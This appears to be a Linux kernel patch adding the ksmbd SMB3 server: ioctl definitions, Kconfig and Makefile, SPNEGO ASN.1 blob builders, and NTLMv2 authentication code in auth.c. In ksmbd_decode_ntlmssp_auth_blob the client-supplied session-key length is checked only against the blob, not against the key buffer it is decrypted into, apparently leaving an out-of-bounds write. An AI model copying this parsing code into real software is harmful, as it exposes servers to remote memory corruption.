++#define FSCTL_QUERY_NETWORK_INTERFACE_INFO 0x001401FC /* BB add struct */
++#define FSCTL_SRV_READ_HASH          0x001441BB /* BB add struct */
++
++/* See MS-FSCC 2.1.2.5 */
++#define IO_REPARSE_TAG_MOUNT_POINT   0xA0000003
++#define IO_REPARSE_TAG_HSM           0xC0000004
++#define IO_REPARSE_TAG_SIS           0x80000007
++#define IO_REPARSE_TAG_HSM2          0x80000006
++#define IO_REPARSE_TAG_DRIVER_EXTENDER 0x80000005
++/* Used by the DFS filter. See MS-DFSC */
++#define IO_REPARSE_TAG_DFS           0x8000000A
++/* Used by the DFS filter See MS-DFSC */
++#define IO_REPARSE_TAG_DFSR          0x80000012
++#define IO_REPARSE_TAG_FILTER_MANAGER 0x8000000B
++/* See section MS-FSCC 2.1.2.4 */
++#define IO_REPARSE_TAG_SYMLINK       0xA000000C
++#define IO_REPARSE_TAG_DEDUP         0x80000013
++#define IO_REPARSE_APPXSTREAM	     0xC0000014
++/* NFS symlinks, Win 8/SMB3 and later */
++#define IO_REPARSE_TAG_NFS           0x80000014
++/*
++ * AzureFileSync - see
++ * https://docs.microsoft.com/en-us/azure/storage/files/storage-sync-cloud-tiering
++ */
++#define IO_REPARSE_TAG_AZ_FILE_SYNC  0x8000001E
++/* WSL reparse tags */
++#define IO_REPARSE_TAG_LX_SYMLINK    0xA000001D
++#define IO_REPARSE_TAG_AF_UNIX	     0x80000023
++#define IO_REPARSE_TAG_LX_FIFO	     0x80000024
++#define IO_REPARSE_TAG_LX_CHR	     0x80000025
++#define IO_REPARSE_TAG_LX_BLK	     0x80000026
++
++#define IO_REPARSE_TAG_LX_SYMLINK_LE	cpu_to_le32(0xA000001D)
++#define IO_REPARSE_TAG_AF_UNIX_LE	cpu_to_le32(0x80000023)
++#define IO_REPARSE_TAG_LX_FIFO_LE	cpu_to_le32(0x80000024)
++#define IO_REPARSE_TAG_LX_CHR_LE	cpu_to_le32(0x80000025)
++#define IO_REPARSE_TAG_LX_BLK_LE	cpu_to_le32(0x80000026)
++
++/* fsctl flags */
++/* If Flags is set to this value, the request is an FSCTL not ioctl request */
++#define SMB2_0_IOCTL_IS_FSCTL		0x00000001
++#endif /* __SMBFSCTL_H */
+diff --git a/fs/smb/server/Kconfig b/fs/smb/server/Kconfig
+new file mode 100644
+index 0000000000000..e1fe17747ed69
+--- /dev/null
++++ b/fs/smb/server/Kconfig
+@@ -0,0 +1,68 @@
++config SMB_SERVER
++	tristate "SMB3 server support (EXPERIMENTAL)"
++	depends on INET
++	depends on MULTIUSER
++	depends on FILE_LOCKING
++	select NLS
++	select NLS_UTF8
++	select CRYPTO
++	select CRYPTO_MD5
++	select CRYPTO_HMAC
++	select CRYPTO_ECB
++	select CRYPTO_LIB_DES
++	select CRYPTO_SHA256
++	select CRYPTO_CMAC
++	select CRYPTO_SHA512
++	select CRYPTO_AEAD2
++	select CRYPTO_CCM
++	select CRYPTO_GCM
++	select ASN1
++	select OID_REGISTRY
++	select CRC32
++	default n
++	help
++	  Choose Y here if you want to allow SMB3 compliant clients
++	  to access files residing on this system using the SMB3 protocol.
++	  To compile the SMB3 server support as a module,
++	  choose M here: the module will be called ksmbd.
++
++	  You may choose to use a Samba server instead, in which
++	  case you can choose N here.
++
++	  You also need to install user space programs which can be found
++	  in ksmbd-tools, available from
++	  https://github.com/cifsd-team/ksmbd-tools.
++	  More detail about how to run the ksmbd kernel server is
++	  available via the README file
++	  (https://github.com/cifsd-team/ksmbd-tools/blob/master/README).
++
++	  The ksmbd kernel server includes support for auto-negotiation,
++	  secure negotiate, pre-authentication integrity, oplock/lease,
++	  compound requests, multi-credit, packet signing, RDMA (smbdirect),
++	  SMB3 encryption, copy-offload, and secure per-user session
++	  establishment via NTLM or NTLMv2.
++
++config SMB_SERVER_SMBDIRECT
++	bool "Support for SMB Direct protocol"
++	depends on SMB_SERVER=m && INFINIBAND && INFINIBAND_ADDR_TRANS || SMB_SERVER=y && INFINIBAND=y && INFINIBAND_ADDR_TRANS=y
++	select SG_POOL
++	default n
++
++	help
++	  Enables SMB Direct support for SMB 3.0, 3.02 and 3.1.1.
++
++	  SMB Direct allows transferring SMB packets over RDMA. If unsure,
++	  say N.
++
++config SMB_SERVER_CHECK_CAP_NET_ADMIN
++	bool "Enable network administration capability check"
++	depends on SMB_SERVER
++	default y
++
++	help
++	  Prevents unprivileged processes from starting the ksmbd kernel server.
++
++config SMB_SERVER_KERBEROS5
++	bool "Support for Kerberos 5"
++	depends on SMB_SERVER
++	default n
+diff --git a/fs/smb/server/Makefile b/fs/smb/server/Makefile
+new file mode 100644
+index 0000000000000..7d6337a7dee40
+--- /dev/null
++++ b/fs/smb/server/Makefile
+@@ -0,0 +1,20 @@
++# SPDX-License-Identifier: GPL-2.0-or-later
++#
++# Makefile for Linux SMB3 kernel server
++#
++obj-$(CONFIG_SMB_SERVER) += ksmbd.o
++
++ksmbd-y :=	unicode.o auth.o vfs.o vfs_cache.o server.o ndr.o \
++		misc.o oplock.o connection.o ksmbd_work.o crypto_ctx.o \
++		mgmt/ksmbd_ida.o mgmt/user_config.o mgmt/share_config.o \
++		mgmt/tree_connect.o mgmt/user_session.o smb_common.o \
++		transport_tcp.o transport_ipc.o smbacl.o smb2pdu.o \
++		smb2ops.o smb2misc.o ksmbd_spnego_negtokeninit.asn1.o \
++		ksmbd_spnego_negtokentarg.asn1.o asn1.o
++
++$(obj)/asn1.o: $(obj)/ksmbd_spnego_negtokeninit.asn1.h $(obj)/ksmbd_spnego_negtokentarg.asn1.h
++
++$(obj)/ksmbd_spnego_negtokeninit.asn1.o: $(obj)/ksmbd_spnego_negtokeninit.asn1.c $(obj)/ksmbd_spnego_negtokeninit.asn1.h
++$(obj)/ksmbd_spnego_negtokentarg.asn1.o: $(obj)/ksmbd_spnego_negtokentarg.asn1.c $(obj)/ksmbd_spnego_negtokentarg.asn1.h
++
++ksmbd-$(CONFIG_SMB_SERVER_SMBDIRECT) += transport_rdma.o
+diff --git a/fs/smb/server/asn1.c b/fs/smb/server/asn1.c
+new file mode 100644
+index 0000000000000..c03eba0903682
+--- /dev/null
++++ b/fs/smb/server/asn1.c
+@@ -0,0 +1,239 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ * The ASN.1/BER parsing code is derived from ip_nat_snmp_basic.c which was in
++ * turn derived from the gxsnmp package by Gregory McLean & Jochen Friedrich
++ *
++ * Copyright (c) 2000 RP Internet (www.rpi.net.au).
++ */
++
++#include <linux/module.h>
++#include <linux/types.h>
++#include <linux/kernel.h>
++#include <linux/mm.h>
++#include <linux/slab.h>
++#include <linux/oid_registry.h>
++
++#include "glob.h"
++
++#include "asn1.h"
++#include "connection.h"
++#include "auth.h"
++#include "ksmbd_spnego_negtokeninit.asn1.h"
++#include "ksmbd_spnego_negtokentarg.asn1.h"
++
++#define NTLMSSP_OID_LEN  10
++
++static char NTLMSSP_OID_STR[NTLMSSP_OID_LEN] = { 0x2b, 0x06, 0x01, 0x04, 0x01,
++	0x82, 0x37, 0x02, 0x02, 0x0a };
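++/* The bytes above are the DER encoding of OID 1.3.6.1.4.1.311.2.2.10 */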
++
++int
++ksmbd_decode_negTokenInit(unsigned char *security_blob, int length,
++			  struct ksmbd_conn *conn)
++{
++	return asn1_ber_decoder(&ksmbd_spnego_negtokeninit_decoder, conn,
++				security_blob, length);
++}
++
++int
++ksmbd_decode_negTokenTarg(unsigned char *security_blob, int length,
++			  struct ksmbd_conn *conn)
++{
++	return asn1_ber_decoder(&ksmbd_spnego_negtokentarg_decoder, conn,
++				security_blob, length);
++}
++
++static int compute_asn_hdr_len_bytes(int len)
++{
++	if (len > 0xFFFFFF)
++		return 4;
++	else if (len > 0xFFFF)
++		return 3;
++	else if (len > 0xFF)
++		return 2;
++	else if (len > 0x7F)
++		return 1;
++	else
++		return 0;
++}
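++
++/*
++ * Example: a length of 300 (0x12C) exceeds 0xFF, so two extra length
++ * octets are needed and the long-form DER encoding is 0x82 0x01 0x2C.
++ */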
++
++static void encode_asn_tag(char *buf, unsigned int *ofs, char tag, char seq,
++			   int length)
++{
++	int i;
++	int index = *ofs;
++	char hdr_len = compute_asn_hdr_len_bytes(length);
++	int len = length + 2 + hdr_len;
++
++	/* insert tag */
++	buf[index++] = tag;
++
++	if (!hdr_len) {
++		buf[index++] = len;
++	} else {
++		buf[index++] = 0x80 | hdr_len;
++		for (i = hdr_len - 1; i >= 0; i--)
++			buf[index++] = (len >> (i * 8)) & 0xFF;
++	}
++
++	/* insert seq */
++	len = len - (index - *ofs);
++	buf[index++] = seq;
++
++	if (!hdr_len) {
++		buf[index++] = len;
++	} else {
++		buf[index++] = 0x80 | hdr_len;
++		for (i = hdr_len - 1; i >= 0; i--)
++			buf[index++] = (len >> (i * 8)) & 0xFF;
++	}
++
++	*ofs += (index - *ofs);
++}
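++
++/*
++ * A minimal sketch of what encode_asn_tag() emits, assuming DER
++ * definite-length rules (illustrative only, never called from the
++ * server paths): a 300-byte payload takes the two-octet long form
++ * for both the outer context tag and the inner sequence.
++ */
++static void __maybe_unused encode_asn_tag_example(void)
++{
++	char buf[8];
++	unsigned int ofs = 0;
++
++	/* Emits: a1 82 01 30 30 82 01 2c (0x130 = 304, 0x12c = 300) */
++	encode_asn_tag(buf, &ofs, 0xa1, 0x30, 300);
++}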
++
++int build_spnego_ntlmssp_neg_blob(unsigned char **pbuffer, u16 *buflen,
++				  char *ntlm_blob, int ntlm_blob_len)
++{
++	char *buf;
++	unsigned int ofs = 0;
++	int neg_result_len = 4 + compute_asn_hdr_len_bytes(1) * 2 + 1;
++	int oid_len = 4 + compute_asn_hdr_len_bytes(NTLMSSP_OID_LEN) * 2 +
++		NTLMSSP_OID_LEN;
++	int ntlmssp_len = 4 + compute_asn_hdr_len_bytes(ntlm_blob_len) * 2 +
++		ntlm_blob_len;
++	int total_len = 4 + compute_asn_hdr_len_bytes(neg_result_len +
++			oid_len + ntlmssp_len) * 2 +
++			neg_result_len + oid_len + ntlmssp_len;
++
++	buf = kmalloc(total_len, GFP_KERNEL);
++	if (!buf)
++		return -ENOMEM;
++
++	/* insert main gss header */
++	encode_asn_tag(buf, &ofs, 0xa1, 0x30, neg_result_len + oid_len +
++			ntlmssp_len);
++
++	/* insert neg result */
++	encode_asn_tag(buf, &ofs, 0xa0, 0x0a, 1);
++	buf[ofs++] = 1;
++
++	/* insert oid */
++	encode_asn_tag(buf, &ofs, 0xa1, 0x06, NTLMSSP_OID_LEN);
++	memcpy(buf + ofs, NTLMSSP_OID_STR, NTLMSSP_OID_LEN);
++	ofs += NTLMSSP_OID_LEN;
++
++	/* insert response token - ntlmssp blob */
++	encode_asn_tag(buf, &ofs, 0xa2, 0x04, ntlm_blob_len);
++	memcpy(buf + ofs, ntlm_blob, ntlm_blob_len);
++	ofs += ntlm_blob_len;
++
++	*pbuffer = buf;
++	*buflen = total_len;
++	return 0;
++}
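++
++/*
++ * Rough shape of the token built above, assuming RFC 4178 negTokenTarg
++ * semantics (a sketch, not a normative layout):
++ *
++ *   a1 <len>                  negTokenTarg
++ *     30 <len>                SEQUENCE
++ *       a0 03 0a 01 01        negState: accept-incomplete (1)
++ *       a1 <len> 06 0a <oid>  supportedMech: NTLMSSP OID
++ *       a2 <len> 04 <len>     responseToken: the NTLMSSP blob
++ */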
++
++int build_spnego_ntlmssp_auth_blob(unsigned char **pbuffer, u16 *buflen,
++				   int neg_result)
++{
++	char *buf;
++	unsigned int ofs = 0;
++	int neg_result_len = 4 + compute_asn_hdr_len_bytes(1) * 2 + 1;
++	int total_len = 4 + compute_asn_hdr_len_bytes(neg_result_len) * 2 +
++		neg_result_len;
++
++	buf = kmalloc(total_len, GFP_KERNEL);
++	if (!buf)
++		return -ENOMEM;
++
++	/* insert main gss header */
++	encode_asn_tag(buf, &ofs, 0xa1, 0x30, neg_result_len);
++
++	/* insert neg result */
++	encode_asn_tag(buf, &ofs, 0xa0, 0x0a, 1);
++	if (neg_result)
++		buf[ofs++] = 2;
++	else
++		buf[ofs++] = 0;
++
++	*pbuffer = buf;
++	*buflen = total_len;
++	return 0;
++}
++
++int ksmbd_gssapi_this_mech(void *context, size_t hdrlen, unsigned char tag,
++			   const void *value, size_t vlen)
++{
++	enum OID oid;
++
++	oid = look_up_OID(value, vlen);
++	if (oid != OID_spnego) {
++		char buf[50];
++
++		sprint_oid(value, vlen, buf, sizeof(buf));
++		ksmbd_debug(AUTH, "Unexpected OID: %s\n", buf);
++		return -EBADMSG;
++	}
++
++	return 0;
++}
++
++int ksmbd_neg_token_init_mech_type(void *context, size_t hdrlen,
++				   unsigned char tag, const void *value,
++				   size_t vlen)
++{
++	struct ksmbd_conn *conn = context;
++	enum OID oid;
++	int mech_type;
++
++	oid = look_up_OID(value, vlen);
++	if (oid == OID_ntlmssp) {
++		mech_type = KSMBD_AUTH_NTLMSSP;
++	} else if (oid == OID_mskrb5) {
++		mech_type = KSMBD_AUTH_MSKRB5;
++	} else if (oid == OID_krb5) {
++		mech_type = KSMBD_AUTH_KRB5;
++	} else if (oid == OID_krb5u2u) {
++		mech_type = KSMBD_AUTH_KRB5U2U;
++	} else {
++		char buf[50];
++
++		sprint_oid(value, vlen, buf, sizeof(buf));
++		ksmbd_debug(AUTH, "Unexpected OID: %s\n", buf);
++		return -EBADMSG;
++	}
++
++	conn->auth_mechs |= mech_type;
++	if (conn->preferred_auth_mech == 0)
++		conn->preferred_auth_mech = mech_type;
++
++	return 0;
++}
++
++int ksmbd_neg_token_init_mech_token(void *context, size_t hdrlen,
++				    unsigned char tag, const void *value,
++				    size_t vlen)
++{
++	struct ksmbd_conn *conn = context;
++
++	conn->mechToken = kmalloc(vlen + 1, GFP_KERNEL);
++	if (!conn->mechToken)
++		return -ENOMEM;
++
++	memcpy(conn->mechToken, value, vlen);
++	conn->mechToken[vlen] = '\0';
++	return 0;
++}
++
++int ksmbd_neg_token_targ_resp_token(void *context, size_t hdrlen,
++				    unsigned char tag, const void *value,
++				    size_t vlen)
++{
++	struct ksmbd_conn *conn = context;
++
++	conn->mechToken = kmalloc(vlen + 1, GFP_KERNEL);
++	if (!conn->mechToken)
++		return -ENOMEM;
++
++	memcpy(conn->mechToken, value, vlen);
++	conn->mechToken[vlen] = '\0';
++	return 0;
++}
+diff --git a/fs/smb/server/asn1.h b/fs/smb/server/asn1.h
+new file mode 100644
+index 0000000000000..ce105f4ce305a
+--- /dev/null
++++ b/fs/smb/server/asn1.h
+@@ -0,0 +1,21 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ * The ASN.1/BER parsing code is derived from ip_nat_snmp_basic.c which was in
++ * turn derived from the gxsnmp package by Gregory McLean & Jochen Friedrich
++ *
++ * Copyright (c) 2000 RP Internet (www.rpi.net.au).
++ * Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __ASN1_H__
++#define __ASN1_H__
++
++int ksmbd_decode_negTokenInit(unsigned char *security_blob, int length,
++			      struct ksmbd_conn *conn);
++int ksmbd_decode_negTokenTarg(unsigned char *security_blob, int length,
++			      struct ksmbd_conn *conn);
++int build_spnego_ntlmssp_neg_blob(unsigned char **pbuffer, u16 *buflen,
++				  char *ntlm_blob, int ntlm_blob_len);
++int build_spnego_ntlmssp_auth_blob(unsigned char **pbuffer, u16 *buflen,
++				   int neg_result);
++#endif /* __ASN1_H__ */
+diff --git a/fs/smb/server/auth.c b/fs/smb/server/auth.c
+new file mode 100644
+index 0000000000000..5e5e120edcc22
+--- /dev/null
++++ b/fs/smb/server/auth.c
+@@ -0,0 +1,1206 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#include <linux/kernel.h>
++#include <linux/fs.h>
++#include <linux/uaccess.h>
++#include <linux/backing-dev.h>
++#include <linux/writeback.h>
++#include <linux/uio.h>
++#include <linux/xattr.h>
++#include <crypto/hash.h>
++#include <crypto/aead.h>
++#include <linux/random.h>
++#include <linux/scatterlist.h>
++
++#include "auth.h"
++#include "glob.h"
++
++#include <linux/fips.h>
++#include <crypto/des.h>
++
++#include "server.h"
++#include "smb_common.h"
++#include "connection.h"
++#include "mgmt/user_session.h"
++#include "mgmt/user_config.h"
++#include "crypto_ctx.h"
++#include "transport_ipc.h"
++#include "../common/arc4.h"
++
++/*
++ * Fixed-format data defining the GSS header and the fixed string
++ * "not_defined_in_RFC4178@please_ignore", so the security blob
++ * for the negotiate phase can be generated statically.
++ */
++static char NEGOTIATE_GSS_HEADER[AUTH_GSS_LENGTH] = {
++#ifdef CONFIG_SMB_SERVER_KERBEROS5
++	0x60, 0x5e, 0x06, 0x06, 0x2b, 0x06, 0x01, 0x05,
++	0x05, 0x02, 0xa0, 0x54, 0x30, 0x52, 0xa0, 0x24,
++	0x30, 0x22, 0x06, 0x09, 0x2a, 0x86, 0x48, 0x86,
++	0xf7, 0x12, 0x01, 0x02, 0x02, 0x06, 0x09, 0x2a,
++	0x86, 0x48, 0x82, 0xf7, 0x12, 0x01, 0x02, 0x02,
++	0x06, 0x0a, 0x2b, 0x06, 0x01, 0x04, 0x01, 0x82,
++	0x37, 0x02, 0x02, 0x0a, 0xa3, 0x2a, 0x30, 0x28,
++	0xa0, 0x26, 0x1b, 0x24, 0x6e, 0x6f, 0x74, 0x5f,
++	0x64, 0x65, 0x66, 0x69, 0x6e, 0x65, 0x64, 0x5f,
++	0x69, 0x6e, 0x5f, 0x52, 0x46, 0x43, 0x34, 0x31,
++	0x37, 0x38, 0x40, 0x70, 0x6c, 0x65, 0x61, 0x73,
++	0x65, 0x5f, 0x69, 0x67, 0x6e, 0x6f, 0x72, 0x65
++#else
++	0x60, 0x48, 0x06, 0x06, 0x2b, 0x06, 0x01, 0x05,
++	0x05, 0x02, 0xa0, 0x3e, 0x30, 0x3c, 0xa0, 0x0e,
++	0x30, 0x0c, 0x06, 0x0a, 0x2b, 0x06, 0x01, 0x04,
++	0x01, 0x82, 0x37, 0x02, 0x02, 0x0a, 0xa3, 0x2a,
++	0x30, 0x28, 0xa0, 0x26, 0x1b, 0x24, 0x6e, 0x6f,
++	0x74, 0x5f, 0x64, 0x65, 0x66, 0x69, 0x6e, 0x65,
++	0x64, 0x5f, 0x69, 0x6e, 0x5f, 0x52, 0x46, 0x43,
++	0x34, 0x31, 0x37, 0x38, 0x40, 0x70, 0x6c, 0x65,
++	0x61, 0x73, 0x65, 0x5f, 0x69, 0x67, 0x6e, 0x6f,
++	0x72, 0x65
++#endif
++};
++
++void ksmbd_copy_gss_neg_header(void *buf)
++{
++	memcpy(buf, NEGOTIATE_GSS_HEADER, AUTH_GSS_LENGTH);
++}
++
++/**
++ * ksmbd_gen_sess_key() - generate the session key
++ * @sess:	session of connection
++ * @hash:	source hash value used to find the session key
++ * @hmac:	source hmac value used to find the session key
++ *
++ */
++static int ksmbd_gen_sess_key(struct ksmbd_session *sess, char *hash,
++			      char *hmac)
++{
++	struct ksmbd_crypto_ctx *ctx;
++	int rc;
++
++	ctx = ksmbd_crypto_ctx_find_hmacmd5();
++	if (!ctx) {
++		ksmbd_debug(AUTH, "could not crypto alloc hmacmd5\n");
++		return -ENOMEM;
++	}
++
++	rc = crypto_shash_setkey(CRYPTO_HMACMD5_TFM(ctx),
++				 hash,
++				 CIFS_HMAC_MD5_HASH_SIZE);
++	if (rc) {
++		ksmbd_debug(AUTH, "hmacmd5 set key fail error %d\n", rc);
++		goto out;
++	}
++
++	rc = crypto_shash_init(CRYPTO_HMACMD5(ctx));
++	if (rc) {
++		ksmbd_debug(AUTH, "could not init hmacmd5 error %d\n", rc);
++		goto out;
++	}
++
++	rc = crypto_shash_update(CRYPTO_HMACMD5(ctx),
++				 hmac,
++				 SMB2_NTLMV2_SESSKEY_SIZE);
++	if (rc) {
++		ksmbd_debug(AUTH, "Could not update with response error %d\n", rc);
++		goto out;
++	}
++
++	rc = crypto_shash_final(CRYPTO_HMACMD5(ctx), sess->sess_key);
++	if (rc) {
++		ksmbd_debug(AUTH, "Could not generate hmacmd5 hash error %d\n", rc);
++		goto out;
++	}
++
++out:
++	ksmbd_release_crypto_ctx(ctx);
++	return rc;
++}
++
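++/*
++ * Assuming MS-NLMP 3.3.2 naming, the hash computed below is NTOWFv2:
++ * HMAC-MD5 keyed with the stored NT hash, taken over
++ * UTF-16LE(uppercase(user)) || UTF-16LE(domain).
++ */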
++static int calc_ntlmv2_hash(struct ksmbd_conn *conn, struct ksmbd_session *sess,
++			    char *ntlmv2_hash, char *dname)
++{
++	int ret, len, conv_len;
++	wchar_t *domain = NULL;
++	__le16 *uniname = NULL;
++	struct ksmbd_crypto_ctx *ctx;
++
++	ctx = ksmbd_crypto_ctx_find_hmacmd5();
++	if (!ctx) {
++		ksmbd_debug(AUTH, "can't generate ntlmv2 hash\n");
++		return -ENOMEM;
++	}
++
++	ret = crypto_shash_setkey(CRYPTO_HMACMD5_TFM(ctx),
++				  user_passkey(sess->user),
++				  CIFS_ENCPWD_SIZE);
++	if (ret) {
++		ksmbd_debug(AUTH, "Could not set NT Hash as a key\n");
++		goto out;
++	}
++
++	ret = crypto_shash_init(CRYPTO_HMACMD5(ctx));
++	if (ret) {
++		ksmbd_debug(AUTH, "could not init hmacmd5\n");
++		goto out;
++	}
++
++	/* convert user_name to unicode */
++	len = strlen(user_name(sess->user));
++	uniname = kzalloc(2 + UNICODE_LEN(len), GFP_KERNEL);
++	if (!uniname) {
++		ret = -ENOMEM;
++		goto out;
++	}
++
++	conv_len = smb_strtoUTF16(uniname, user_name(sess->user), len,
++				  conn->local_nls);
++	if (conv_len < 0 || conv_len > len) {
++		ret = -EINVAL;
++		goto out;
++	}
++	UniStrupr(uniname);
++
++	ret = crypto_shash_update(CRYPTO_HMACMD5(ctx),
++				  (char *)uniname,
++				  UNICODE_LEN(conv_len));
++	if (ret) {
++		ksmbd_debug(AUTH, "Could not update with user\n");
++		goto out;
++	}
++
++	/* Convert domain name or conn name to unicode (not uppercased) */
++	len = strlen(dname);
++	domain = kzalloc(2 + UNICODE_LEN(len), GFP_KERNEL);
++	if (!domain) {
++		ret = -ENOMEM;
++		goto out;
++	}
++
++	conv_len = smb_strtoUTF16((__le16 *)domain, dname, len,
++				  conn->local_nls);
++	if (conv_len < 0 || conv_len > len) {
++		ret = -EINVAL;
++		goto out;
++	}
++
++	ret = crypto_shash_update(CRYPTO_HMACMD5(ctx),
++				  (char *)domain,
++				  UNICODE_LEN(conv_len));
++	if (ret) {
++		ksmbd_debug(AUTH, "Could not update with domain\n");
++		goto out;
++	}
++
++	ret = crypto_shash_final(CRYPTO_HMACMD5(ctx), ntlmv2_hash);
++	if (ret)
++		ksmbd_debug(AUTH, "Could not generate md5 hash\n");
++out:
++	kfree(uniname);
++	kfree(domain);
++	ksmbd_release_crypto_ctx(ctx);
++	return ret;
++}
++
++/**
++ * ksmbd_auth_ntlmv2() - NTLMv2 authentication handler
++ * @conn:	connection
++ * @sess:	session of connection
++ * @ntlmv2:	NTLMv2 challenge response
++ * @blen:	NTLMv2 blob length
++ * @domain_name:	domain name
++ * @cryptkey:	8-byte server challenge
++ *
++ * Return:	0 on success, error number on error
++ */
++int ksmbd_auth_ntlmv2(struct ksmbd_conn *conn, struct ksmbd_session *sess,
++		      struct ntlmv2_resp *ntlmv2, int blen, char *domain_name,
++		      char *cryptkey)
++{
++	char ntlmv2_hash[CIFS_ENCPWD_SIZE];
++	char ntlmv2_rsp[CIFS_HMAC_MD5_HASH_SIZE];
++	struct ksmbd_crypto_ctx *ctx = NULL;
++	char *construct = NULL;
++	int rc, len;
++
++	rc = calc_ntlmv2_hash(conn, sess, ntlmv2_hash, domain_name);
++	if (rc) {
++		ksmbd_debug(AUTH, "could not get v2 hash rc %d\n", rc);
++		goto out;
++	}
++
++	ctx = ksmbd_crypto_ctx_find_hmacmd5();
++	if (!ctx) {
++		ksmbd_debug(AUTH, "could not crypto alloc hmacmd5\n");
++		return -ENOMEM;
++	}
++
++	rc = crypto_shash_setkey(CRYPTO_HMACMD5_TFM(ctx),
++				 ntlmv2_hash,
++				 CIFS_HMAC_MD5_HASH_SIZE);
++	if (rc) {
++		ksmbd_debug(AUTH, "Could not set NTLMV2 Hash as a key\n");
++		goto out;
++	}
++
++	rc = crypto_shash_init(CRYPTO_HMACMD5(ctx));
++	if (rc) {
++		ksmbd_debug(AUTH, "Could not init hmacmd5\n");
++		goto out;
++	}
++
++	len = CIFS_CRYPTO_KEY_SIZE + blen;
++	construct = kzalloc(len, GFP_KERNEL);
++	if (!construct) {
++		rc = -ENOMEM;
++		goto out;
++	}
++
++	memcpy(construct, cryptkey, CIFS_CRYPTO_KEY_SIZE);
++	memcpy(construct + CIFS_CRYPTO_KEY_SIZE, &ntlmv2->blob_signature, blen);
++
++	rc = crypto_shash_update(CRYPTO_HMACMD5(ctx), construct, len);
++	if (rc) {
++		ksmbd_debug(AUTH, "Could not update with response\n");
++		goto out;
++	}
++
++	rc = crypto_shash_final(CRYPTO_HMACMD5(ctx), ntlmv2_rsp);
++	if (rc) {
++		ksmbd_debug(AUTH, "Could not generate md5 hash\n");
++		goto out;
++	}
++	ksmbd_release_crypto_ctx(ctx);
++	ctx = NULL;
++
++	rc = ksmbd_gen_sess_key(sess, ntlmv2_hash, ntlmv2_rsp);
++	if (rc) {
++		ksmbd_debug(AUTH, "Could not generate sess key\n");
++		goto out;
++	}
++
++	if (memcmp(ntlmv2->ntlmv2_hash, ntlmv2_rsp, CIFS_HMAC_MD5_HASH_SIZE) != 0)
++		rc = -EINVAL;
++out:
++	if (ctx)
++		ksmbd_release_crypto_ctx(ctx);
++	kfree(construct);
++	return rc;
++}
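++
++/*
++ * Sketch of the verification above, again assuming MS-NLMP naming:
++ *
++ *   NTProofStr     = HMAC-MD5(NTOWFv2, ServerChallenge || ClientBlob)
++ *   SessionBaseKey = HMAC-MD5(NTOWFv2, NTProofStr)
++ *
++ * The client's NTProofStr (carried in ntlmv2->ntlmv2_hash) must match
++ * the recomputed value for the session to authenticate.
++ */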
++
++/**
++ * ksmbd_decode_ntlmssp_auth_blob() - helper function to decode
++ * authenticate blob
++ * @authblob:	authenticate blob source pointer
++ * @blob_len:	length of the authenticate blob
++ * @conn:	connection
++ * @sess:	session of connection
++ *
++ * Return:	0 on success, error number on error
++ */
++int ksmbd_decode_ntlmssp_auth_blob(struct authenticate_message *authblob,
++				   int blob_len, struct ksmbd_conn *conn,
++				   struct ksmbd_session *sess)
++{
++	char *domain_name;
++	unsigned int nt_off, dn_off;
++	unsigned short nt_len, dn_len;
++	int ret;
++
++	if (blob_len < sizeof(struct authenticate_message)) {
++		ksmbd_debug(AUTH, "negotiate blob len %d too small\n",
++			    blob_len);
++		return -EINVAL;
++	}
++
++	if (memcmp(authblob->Signature, "NTLMSSP", 8)) {
++		ksmbd_debug(AUTH, "blob signature incorrect %s\n",
++			    authblob->Signature);
++		return -EINVAL;
++	}
++
++	nt_off = le32_to_cpu(authblob->NtChallengeResponse.BufferOffset);
++	nt_len = le16_to_cpu(authblob->NtChallengeResponse.Length);
++	dn_off = le32_to_cpu(authblob->DomainName.BufferOffset);
++	dn_len = le16_to_cpu(authblob->DomainName.Length);
++
++	if (blob_len < (u64)dn_off + dn_len || blob_len < (u64)nt_off + nt_len ||
++	    nt_len < CIFS_ENCPWD_SIZE)
++		return -EINVAL;
++
++	/* TODO: use the domain name imported from the configuration file */
++	domain_name = smb_strndup_from_utf16((const char *)authblob + dn_off,
++					     dn_len, true, conn->local_nls);
++	if (IS_ERR(domain_name))
++		return PTR_ERR(domain_name);
++
++	/* process NTLMv2 authentication */
++	ksmbd_debug(AUTH, "decode_ntlmssp_authenticate_blob dname%s\n",
++		    domain_name);
++	ret = ksmbd_auth_ntlmv2(conn, sess,
++				(struct ntlmv2_resp *)((char *)authblob + nt_off),
++				nt_len - CIFS_ENCPWD_SIZE,
++				domain_name, conn->ntlmssp.cryptkey);
++	kfree(domain_name);
++
++	/* The recovered secondary session key */
++	if (conn->ntlmssp.client_flags & NTLMSSP_NEGOTIATE_KEY_XCH) {
++		struct arc4_ctx *ctx_arc4;
++		unsigned int sess_key_off, sess_key_len;
++
++		sess_key_off = le32_to_cpu(authblob->SessionKey.BufferOffset);
++		sess_key_len = le16_to_cpu(authblob->SessionKey.Length);
++
++		if (blob_len < (u64)sess_key_off + sess_key_len)
++			return -EINVAL;
++
++		ctx_arc4 = kmalloc(sizeof(*ctx_arc4), GFP_KERNEL);
++		if (!ctx_arc4)
++			return -ENOMEM;
++
++		cifs_arc4_setkey(ctx_arc4, sess->sess_key,
++				 SMB2_NTLMV2_SESSKEY_SIZE);
++		cifs_arc4_crypt(ctx_arc4, sess->sess_key,
++				(char *)authblob + sess_key_off, sess_key_len);
++		kfree_sensitive(ctx_arc4);
++	}
++
++	return ret;
++}
++
++/**
++ * ksmbd_decode_ntlmssp_neg_blob() - helper function to decode
++ * negotiate blob
++ * @negblob:	negotiate blob source pointer
++ * @blob_len:	length of the negotiate blob
++ * @conn:	connection
++ *
++ */
++int ksmbd_decode_ntlmssp_neg_blob(struct negotiate_message *negblob,
++				  int blob_len, struct ksmbd_conn *conn)
++{
++	if (blob_len < sizeof(struct negotiate_message)) {
++		ksmbd_debug(AUTH, "negotiate blob len %d too small\n",
++			    blob_len);
++		return -EINVAL;
++	}
++
++	if (memcmp(negblob->Signature, "NTLMSSP", 8)) {
++		ksmbd_debug(AUTH, "blob signature incorrect %s\n",
++			    negblob->Signature);
++		return -EINVAL;
++	}
++
++	conn->ntlmssp.client_flags = le32_to_cpu(negblob->NegotiateFlags);
++	return 0;
++}
++
++/**
